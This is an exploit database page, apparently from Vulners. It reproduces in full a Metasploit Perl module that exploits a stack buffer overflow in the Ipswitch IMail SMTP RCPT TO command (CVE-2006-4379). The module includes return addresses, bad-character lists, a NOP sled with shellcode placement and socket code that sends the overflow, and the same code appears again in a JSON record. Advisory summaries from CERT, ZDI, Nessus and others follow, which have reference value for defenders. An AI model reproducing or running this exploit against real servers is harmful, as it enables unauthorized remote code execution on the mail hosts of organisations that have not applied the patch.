Search...

Imail 8.10-8.12 RCPT TO Remote Buffer Overflow Exploit meta

2007-02-04T00:00:00

ID EDB-ID:3265
Type exploitdb
Reporter Jacopo Cervini
Modified 2007-02-04T00:00:00

Description

Imail 8.10-8.12 (RCPT TO) Remote Buffer Overflow Exploit (meta). CVE-2006-4379. Remote exploit for windows platform

                                        
                                            ## 
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::imail_smtp_rcpt_overflow;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };

my $info = {
	'Name'    =&gt; 'IMail 2006 and 8.x SMTP Stack Overflow Exploit',
	'Version'  =&gt; '$Revision: 1.0 $',
	'Authors' =&gt; [ 'Jacopo Cervini &lt;acaro [at] jervus.it&gt;', ],
	'Arch'    =&gt; [ 'x86' ],
	'OS'      =&gt; [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],
	'Priv'    =&gt; 1,

	'UserOpts'  =&gt;
	  {
		'RHOST' =&gt; [1, 'ADDR', 'The target address'],
		'RPORT' =&gt; [1, 'PORT', 'The target port', 25],
		'Encoder'   =&gt; [1, 'EncodedPayload', 'Use Pex!!'],

		
	  },

	'AutoOpts'  =&gt; { 'EXITFUNC'  =&gt; 'seh' },
	'Payload' =&gt;
	  {
		'Space'     =&gt; 400,
		'BadChars'  =&gt; "\x00\x0d\x0a\x20\x3e\x22\x40",
		'Keys'      =&gt; ['+ws2ord'],
		

	  },

	'Description'  =&gt; Pex::Text::Freeform(qq{
This module exploits a stack based buffer overflow in IMail 2006 and 8.x SMTP service.
If we send a long strings for RCPT TO command contained within the characters '@' and ':'
we can overwrite the eip register and exploit the vulnerable smpt service
}),

	'Refs'  =&gt;
	  [
		['BID', '19885'],
		['CVE', '2006-4379'],
		['URL',   'http://www.zerodayinitiative.com/advisories/ZDI-06-028.html'],
	  ],

	'Targets' =&gt;
	  [

	['Universal IMail 8.10',0x100188c3 ], # pop eax, ret in SmtpDLL.dll for IMail 8.10
	['Universal IMail 8.12',0x100191c4 ], # pop eax, ret in SmtpDLL.dll for IMail 8.12


	  ],

	'DefaultTarget' =&gt; 0,

	'Keys' =&gt; ['smtp'],

	'DisclosureDate' =&gt; 'September 7 2006',
  };

sub new {
	my $class = shift;
	my $self = $class-&gt;SUPER::new({'Info' =&gt; $info, 'Advanced' =&gt; $advanced}, @_);

	return($self);
}

sub Exploit {
	my $self = shift;
	my $target_host = $self-&gt;GetVar('RHOST');
	my $target_port = $self-&gt;GetVar('RPORT');
	my $target_idx  = $self-&gt;GetVar('TARGET');
	my $shellcode   = $self-&gt;GetVar('EncodedPayload')-&gt;Payload;

	my $target = $self-&gt;Targets-&gt;[$target_idx];



	my $ehlo = "EHLO " . "\r\n";

	my $mail_from = "MAIL FROM:" . "\x20" . "\x3c"."acaro". "\x40"."jervus.it" . "\x3e" . "\r\n";


	my $pattern = "\x20\x3c\x40";
	$pattern .= pack('V', $target-&gt;[1]);
	$pattern .="\x3a" . $self-&gt;MakeNops((0x1e8-length ($shellcode)));
	$pattern .= $shellcode;
	$pattern .= "\x4a\x61\x63\x3e"; 

	my $request = "RCPT TO: " . $pattern ."\n";

	$self-&gt;PrintLine(sprintf ("[*] Trying ".$target-&gt;[0]." using pop eax, ret at 0x%.8x...", $target-&gt;[1]));

	my $s = Msf::Socket::Tcp-&gt;new
	  (
		'PeerAddr'  =&gt; $target_host,
		'PeerPort'  =&gt; $target_port,
		'LocalPort' =&gt; $self-&gt;GetVar('CPORT'),
		'SSL'       =&gt; $self-&gt;GetVar('SSL'),
	  );

	if ($s-&gt;IsError) {
		$self-&gt;PrintLine('[*] Error creating socket: ' . $s-&gt;GetError);
		return;
	}
my $r = $s-&gt;Recv(-1, 5);

	$s-&gt;Send($ehlo);
	$self-&gt;PrintLine("[*] I'm sending ehlo command");
	$self-&gt;PrintLine("[*] $r");
	sleep(2);
		
	$s-&gt;Send($mail_from);
	$self-&gt;PrintLine("[*] I'm sending mail from command");
	$r = $s-&gt;Recv(-1, 10);
	$self-&gt;PrintLine("[*] $r");
	sleep(2);

	$s-&gt;Send($request);
	$self-&gt;PrintLine("[*] I'm sending rcpt to command");
	sleep(2);

	return;
}

# milw0rm.com [2007-02-04]

JSON Vulners Source

Initial Source

{"bulletinFamily": "exploit", "id": "EDB-ID:3265", "cvelist": ["CVE-2006-4379"], "modified": "2007-02-04T00:00:00", "lastseen": "2016-01-31T18:05:26", "edition": 1, "sourceData": "## \r\n# This file is part of the Metasploit Framework and may be redistributed\r\n# according to the licenses defined in the Authors field below. In the\r\n# case of an unknown or missing license, this file defaults to the same\r\n# license as the core Framework (dual GPLv2 and Artistic). The latest\r\n# version of the Framework can always be obtained from metasploit.com.\r\n##\r\n\r\npackage Msf::Exploit::imail_smtp_rcpt_overflow;\r\nuse base \"Msf::Exploit\";\r\nuse strict;\r\nuse Pex::Text;\r\nmy $advanced = { };\r\n\r\nmy $info = {\r\n\t'Name' => 'IMail 2006 and 8.x SMTP Stack Overflow Exploit',\r\n\t'Version' => '$Revision: 1.0 $',\r\n\t'Authors' => [ 'Jacopo Cervini <acaro [at] jervus.it>', ],\r\n\t'Arch' => [ 'x86' ],\r\n\t'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],\r\n\t'Priv' => 1,\r\n\r\n\t'UserOpts' =>\r\n\t {\r\n\t\t'RHOST' => [1, 'ADDR', 'The target address'],\r\n\t\t'RPORT' => [1, 'PORT', 'The target port', 25],\r\n\t\t'Encoder' => [1, 'EncodedPayload', 'Use Pex!!'],\r\n\r\n\t\t\r\n\t },\r\n\r\n\t'AutoOpts' => { 'EXITFUNC' => 'seh' },\r\n\t'Payload' =>\r\n\t {\r\n\t\t'Space' => 400,\r\n\t\t'BadChars' => \"\\x00\\x0d\\x0a\\x20\\x3e\\x22\\x40\",\r\n\t\t'Keys' => ['+ws2ord'],\r\n\t\t\r\n\r\n\t },\r\n\r\n\t'Description' => Pex::Text::Freeform(qq{\r\nThis module exploits a stack based buffer overflow in IMail 2006 and 8.x SMTP service.\r\nIf we send a long strings for RCPT TO command contained within the characters '@' and ':'\r\nwe can overwrite the eip register and exploit the vulnerable smpt service\r\n}),\r\n\r\n\t'Refs' =>\r\n\t [\r\n\t\t['BID', '19885'],\r\n\t\t['CVE', '2006-4379'],\r\n\t\t['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-06-028.html'],\r\n\t ],\r\n\r\n\t'Targets' =>\r\n\t [\r\n\r\n\t['Universal IMail 8.10',0x100188c3 ], # pop eax, ret in SmtpDLL.dll for IMail 8.10\r\n\t['Universal IMail 8.12',0x100191c4 ], # pop eax, ret in SmtpDLL.dll for IMail 8.12\r\n\r\n\r\n\t ],\r\n\r\n\t'DefaultTarget' => 0,\r\n\r\n\t'Keys' => ['smtp'],\r\n\r\n\t'DisclosureDate' => 'September 7 2006',\r\n };\r\n\r\nsub new {\r\n\tmy $class = shift;\r\n\tmy $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);\r\n\r\n\treturn($self);\r\n}\r\n\r\nsub Exploit {\r\n\tmy $self = shift;\r\n\tmy $target_host = $self->GetVar('RHOST');\r\n\tmy $target_port = $self->GetVar('RPORT');\r\n\tmy $target_idx = $self->GetVar('TARGET');\r\n\tmy $shellcode = $self->GetVar('EncodedPayload')->Payload;\r\n\r\n\tmy $target = $self->Targets->[$target_idx];\r\n\r\n\r\n\r\n\tmy $ehlo = \"EHLO \" . \"\\r\\n\";\r\n\r\n\tmy $mail_from = \"MAIL FROM:\" . \"\\x20\" . \"\\x3c\".\"acaro\". \"\\x40\".\"jervus.it\" . \"\\x3e\" . \"\\r\\n\";\r\n\r\n\r\n\tmy $pattern = \"\\x20\\x3c\\x40\";\r\n\t$pattern .= pack('V', $target->[1]);\r\n\t$pattern .=\"\\x3a\" . $self->MakeNops((0x1e8-length ($shellcode)));\r\n\t$pattern .= $shellcode;\r\n\t$pattern .= \"\\x4a\\x61\\x63\\x3e\"; \r\n\r\n\tmy $request = \"RCPT TO: \" . $pattern .\"\\n\";\r\n\r\n\t$self->PrintLine(sprintf (\"[*] Trying \".$target->[0].\" using pop eax, ret at 0x%.8x...\", $target->[1]));\r\n\r\n\tmy $s = Msf::Socket::Tcp->new\r\n\t (\r\n\t\t'PeerAddr' => $target_host,\r\n\t\t'PeerPort' => $target_port,\r\n\t\t'LocalPort' => $self->GetVar('CPORT'),\r\n\t\t'SSL' => $self->GetVar('SSL'),\r\n\t );\r\n\r\n\tif ($s->IsError) {\r\n\t\t$self->PrintLine('[*] Error creating socket: ' . $s->GetError);\r\n\t\treturn;\r\n\t}\r\nmy $r = $s->Recv(-1, 5);\r\n\r\n\t$s->Send($ehlo);\r\n\t$self->PrintLine(\"[*] I'm sending ehlo command\");\r\n\t$self->PrintLine(\"[*] $r\");\r\n\tsleep(2);\r\n\t\t\r\n\t$s->Send($mail_from);\r\n\t$self->PrintLine(\"[*] I'm sending mail from command\");\r\n\t$r = $s->Recv(-1, 10);\r\n\t$self->PrintLine(\"[*] $r\");\r\n\tsleep(2);\r\n\r\n\t$s->Send($request);\r\n\t$self->PrintLine(\"[*] I'm sending rcpt to command\");\r\n\tsleep(2);\r\n\r\n\treturn;\r\n}\r\n\r\n# milw0rm.com [2007-02-04]\r\n", "published": "2007-02-04T00:00:00", "href": "https://www.exploit-db.com/exploits/3265/", "osvdbidlist": [], "reporter": "Jacopo Cervini", "hash": "f6a74b645b053f913ffba4147cd6f7b5acfc4e48f173ba7f4c2544db1ef98a0a", "title": "Imail 8.10-8.12 RCPT TO Remote Buffer Overflow Exploit meta", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Imail 8.10-8.12 (RCPT TO) Remote Buffer Overflow Exploit (meta). CVE-2006-4379. Remote exploit for windows platform", "references": [], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3265/", "enchantments": {"vulnersScore": 4.7}}

{"result": {"cve": [{"id": "CVE-2006-4379", "type": "cve", "title": "CVE-2006-4379", "description": "Stack-based buffer overflow in the SMTP Daemon in Ipswitch Collaboration 2006 Suite Premium and Standard Editions, IMail, IMail Plus, and IMail Secure allows remote attackers to execute arbitrary code via a long string located after an '@' character and before a ':' character.", "published": "2006-09-08T17:04:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4379", "cvelist": ["CVE-2006-4379"], "lastseen": "2017-07-20T10:49:30"}], "cert": [{"id": "VU:542197", "type": "cert", "title": "The Ipswitch IMail Server is vulnerable to a buffer overflow", "description": "### Overview\n\nThe Ipswitch IMail Server is vulnerable to a buffer overflow. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code or cause a denial-of-service condition.\n\n### Description\n\nAccording to [Ipswitch Security Advisory 20061101](<http://www.ipswitch.com/support/imail/releases/security_advisory_20061101.asp>): \n\n_A vulnerability that allowed remote attackers to execute arbitrary code within the SMTP daemon was recently discovered. Because of compiler options used to prevent buffer overflow exploitation, arbitrary code execution does not work in 8.2x or 2006, but the exploit can be used to create a Denial of Service condition. Versions 8.1x and lower are vulnerable to the arbitrary code execution and versions prior to 8.1x may also be vulnerable.__ _\n\nNote that we are aware of publicly available exploit code for this vulnerability and have received reports of successful exploitation. \n \n--- \n \n### Impact\n\nA remote, unauthenticated attacker may be able to execute arbitrary code or cause a denial of service condition. \n \n--- \n \n### Solution\n\n**Apply Update** \nThis issue is addressed in [Ipswitch Security Advisory 20061101](<http://www.ipswitch.com/support/imail/releases/security_advisory_20061101.asp>). \n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nIpswitch, Inc| | -| 07 Dec 2006 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23542197 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://www.ipswitch.com/support/ics/updates/ics20061.asp>\n * <http://www.ipswitch.com/support/imail/releases/im20061.asp>\n * <http://secunia.com/advisories/21795/>\n * <http://www.mail-archive.com/imail_forum@list.ipswitch.com/msg108403.html>\n\n### Credit\n\nThis issue was reported in [Ipswitch Security Advisory 20061101](<http://www.ipswitch.com/support/imail/releases/security_advisory_20061101.asp>). Ipswitch credits the Zero Day Initiative (ZDI), an initiative launched by TippingPoint, a division of 3Com for reporting this issue.\n\nThis document was written by Chris Taschner.\n\n### Other Information\n\n * CVE IDs: [CVE-2006-4379](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4379>)\n * Date Public: 07 Sep 2006\n * Date First Published: 07 Dec 2006\n * Date Last Updated: 07 Dec 2006\n * Severity Metric: 12.86\n * Document Revision: 8\n\n", "published": "2006-12-07T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.kb.cert.org/vuls/id/542197", "cvelist": ["CVE-2006-4379", "CVE-2006-4379"], "lastseen": "2016-02-03T09:12:47"}], "saint": [{"id": "SAINT:E37DDFF59A1E227DF4B47DCC85F5D059", "type": "saint", "title": "IMail SMTP RCPT TO buffer overflow", "description": "Added: 09/29/2006 \nCVE: [CVE-2006-4379](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4379>) \nBID: [19885](<http://www.securityfocus.com/bid/19885>) \nOSVDB: [28576](<http://www.osvdb.org/28576>) \n\n\n### Background\n\n[IMail](<http://www.ipswitch.com/products/imail/index.asp>) is an e-mail server for Windows platforms. \n\n### Problem\n\nA buffer overflow vulnerability in the SMTP daemon allows remote command execution by sending a `**RCPT TO**` argument containing a long string between `**@**` and `**:**` characters. \n\n### Resolution\n\n[Upgrade](<http://www.ipswitch.com/support/imail/patch-upgrades.asp>) to IMail 2006.1 or higher. \n\n### References\n\n<http://www.securityfocus.com/archive/1/445521> \n\n\n### Limitations\n\nExploit works with IMail Server 8.10. Exploitation requires that the server have a fixed IP address. Due to the nature of the vulnerability, the success of the exploit may depend on the state of the target system. \n\n### Platforms\n\nWindows 2000 \nWindows Server 2003 \n \n\n", "published": "2006-09-29T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/imail_smtp_rcpt_to", "cvelist": ["CVE-2006-4379"], "lastseen": "2017-01-10T14:03:42"}, {"id": "SAINT:3E21A071B66E8A04574166D9F5116C55", "type": "saint", "title": "IMail SMTP RCPT TO buffer overflow", "description": "Added: 09/29/2006 \nCVE: [CVE-2006-4379](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4379>) \nBID: [19885](<http://www.securityfocus.com/bid/19885>) \nOSVDB: [28576](<http://www.osvdb.org/28576>) \n\n\n### Background\n\n[IMail](<http://www.ipswitch.com/products/imail/index.asp>) is an e-mail server for Windows platforms. \n\n### Problem\n\nA buffer overflow vulnerability in the SMTP daemon allows remote command execution by sending a `**RCPT TO**` argument containing a long string between `**@**` and `**:**` characters. \n\n### Resolution\n\n[Upgrade](<http://www.ipswitch.com/support/imail/patch-upgrades.asp>) to IMail 2006.1 or higher. \n\n### References\n\n<http://www.securityfocus.com/archive/1/445521> \n\n\n### Limitations\n\nExploit works with IMail Server 8.10. Exploitation requires that the server have a fixed IP address. Due to the nature of the vulnerability, the success of the exploit may depend on the state of the target system. \n\n### Platforms\n\nWindows 2000 \nWindows Server 2003 \n \n\n", "published": "2006-09-29T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/imail_smtp_rcpt_to", "cvelist": ["CVE-2006-4379"], "lastseen": "2016-10-03T15:01:55"}, {"id": "SAINT:4DE1AB6F5F9AA27FADB8EB2DA87D3E08", "type": "saint", "title": "IMail SMTP RCPT TO buffer overflow", "description": "Added: 09/29/2006 \nCVE: [CVE-2006-4379](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4379>) \nBID: [19885](<http://www.securityfocus.com/bid/19885>) \nOSVDB: [28576](<http://www.osvdb.org/28576>) \n\n\n### Background\n\n[IMail](<http://www.ipswitch.com/products/imail/index.asp>) is an e-mail server for Windows platforms. \n\n### Problem\n\nA buffer overflow vulnerability in the SMTP daemon allows remote command execution by sending a `**RCPT TO**` argument containing a long string between `**@**` and `**:**` characters. \n\n### Resolution\n\n[Upgrade](<http://www.ipswitch.com/support/imail/patch-upgrades.asp>) to IMail 2006.1 or higher. \n\n### References\n\n<http://www.securityfocus.com/archive/1/445521> \n\n\n### Limitations\n\nExploit works with IMail Server 8.10. Exploitation requires that the server have a fixed IP address. Due to the nature of the vulnerability, the success of the exploit may depend on the state of the target system. \n\n### Platforms\n\nWindows 2000 \nWindows Server 2003 \n \n\n", "published": "2006-09-29T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/imail_smtp_rcpt_to", "cvelist": ["CVE-2006-4379"], "lastseen": "2016-12-14T16:58:05"}], "canvas": [{"id": "IMAIL_RCPTOVERFLOW", "type": "canvas", "title": "Immunity Canvas: IMAIL_RCPTOVERFLOW", "description": "**Name**| imail_rcptoverflow \n---|--- \n**CVE**| CVE-2006-4379 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| IMail SMTPD32 Stack Overflow \n**Notes**| CVE Name: CVE-2006-4379 \nVENDOR: IPSwitch \nPost-exploitaion: Post-exploitation requires stoping and starting the IMail SMTP Server Service \nFrom a different process (use injectprocess to get a new listener) runcommand: net stop \"IMail SMTP Server\" \nnet start \"IMail SMTP Server\" \nPlatforms Tested: Windows 2000 SP4 (English) IMail 8.13 \n \nDate public: 2006-09-07 \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4379 \nCVSS: 7.5 \n\n", "published": "2006-09-08T17:04:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/imail_rcptoverflow", "cvelist": ["CVE-2006-4379"], "lastseen": "2016-09-25T14:13:15"}], "osvdb": [{"id": "OSVDB:28576", "type": "osvdb", "title": "Ipswitch IMail Server SMTP Service Crafted RCPT String Remote Overflow", "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://www.ipswitch.com/support/ics/updates/ics20061.asp)\n[Secunia Advisory ID:21795](https://secuniaresearch.flexerasoftware.com/advisories/21795/)\nOther Advisory URL: http://www.juniper.net/security/auto/vulnerabilities/vuln3414.html\nOther Advisory URL: http://www.zerodayinitiative.com/advisories/ZDI-06-028.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-09/0093.html\nGeneric Exploit URL: http://www.milw0rm.com/exploits/2601\nFrSIRT Advisory: ADV-2006-3496\n[CVE-2006-4379](https://vulners.com/cve/CVE-2006-4379)\nBugtraq ID: 19885\n", "published": "2006-09-07T06:03:59", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:28576", "cvelist": ["CVE-2006-4379"], "lastseen": "2017-04-28T13:20:24"}], "zdi": [{"id": "ZDI-06-028", "type": "zdi", "title": "Ipswitch Collaboration Suite SMTP Server Stack Overflow Vulnerability", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Ipswitch Collaboration Suite and IMail. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the SMTP daemon. A lack of bounds checking during the parsing of long strings contained within the characters '@' and ':' leads to a stack overflow vulnerability. Exploitation can result in code execution or a denial of service.", "published": "2006-09-08T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://www.zerodayinitiative.com/advisories/ZDI-06-028", "cvelist": ["CVE-2006-4379"], "lastseen": "2016-11-09T00:18:16"}], "nessus": [{"id": "IPSWITCH_IMAIL_2006.1.NASL", "type": "nessus", "title": "Ipswitch IMail Server SMTP Service Crafted RCPT String Remote Overflow", "description": "The remote host is running Ipswitch Collaboration Suite / IMail Secure Server / IMail Server, commercial messaging and collaboration suites for Windows.\n\nAccording to its banner, the version of Ipswitch Collaboration Suite / IMail Secure Server / IMail Server installed on the remote host has a stack-based buffer overflow in its SMTP server component that can be triggered by long strings within the characters '@' and ':'. An unauthenticated attacker may be able to leverage this flaw to crash the SMTP service or even to execute arbitrary code remotely.", "published": "2006-09-08T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=22314", "cvelist": ["CVE-2006-4379"], "lastseen": "2017-10-29T13:37:05"}], "exploitdb": [{"id": "EDB-ID:2601", "type": "exploitdb", "title": "Ipswitch IMail Server 2006 / 8.x RCPT Remote Stack Overflow Exploit", "description": "Ipswitch IMail Server 2006 / 8.x (RCPT) Remote Stack Overflow Exploit. CVE-2006-4379. Remote exploit for windows platform", "published": "2006-10-19T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/2601/", "cvelist": ["CVE-2006-4379"], "lastseen": "2016-01-31T16:38:21"}]}}